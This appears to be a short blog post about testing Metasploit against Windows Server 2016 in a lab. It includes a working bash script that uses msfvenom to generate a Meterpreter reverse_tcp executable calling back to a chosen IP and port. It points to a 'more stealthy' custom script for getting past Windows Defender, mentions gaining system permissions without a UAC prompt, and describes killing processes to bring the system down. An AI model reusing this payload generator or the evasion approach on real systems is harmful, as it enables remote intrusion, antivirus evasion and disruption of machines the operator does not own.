Windows 2016 Server and Metasploit

Alive and kicking. Windows 2016 10.0.14393 RTM and some Metasploit testing. I decided not to use MobaXterm for file transfer, as it somehow messes up the NTFS security permissions.

This time I have just used Samba to transfer the payloads to the testing system.

In the first scenario I used a simple msfvenom-generated EXE to check whether Windows Defender on the Windows 2016 system notices it. As expected, it detects the generated payload and blocks the file transfer.

#!/bin/bash
# Prompts for the listener IP and port, then builds a Meterpreter reverse TCP EXE with msfvenom.
clear
echo "************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " By Astr0baby 2011 "
echo " For Automatic Teensy programming and deployment "
echo "************************************************************"
echo -e "What IP are we gonna use ? \c"
read -r IP
echo -e "What Port Number are we gonna listen to? : \c"
read -r port
# ./msfvenom is expected in the current directory; the generated file is written to default.ex
./msfvenom -p windows/meterpreter/reverse_tcp LHOST="$IP" LPORT="$port" EXITFUNC=thread R -f exe > default.ex

Next we try the more stealthy method:

https://github.com/DoktorCranium/metasploit/blob/master/CUSTOM-meterpreter.sh

From within the default Administrator account, no UAC prompt gets in the way of obtaining some good system permissions.

Once we have the permissions, we mess around with killing some PIDs to bring the system down.

Please see the recording of the above example here:

 
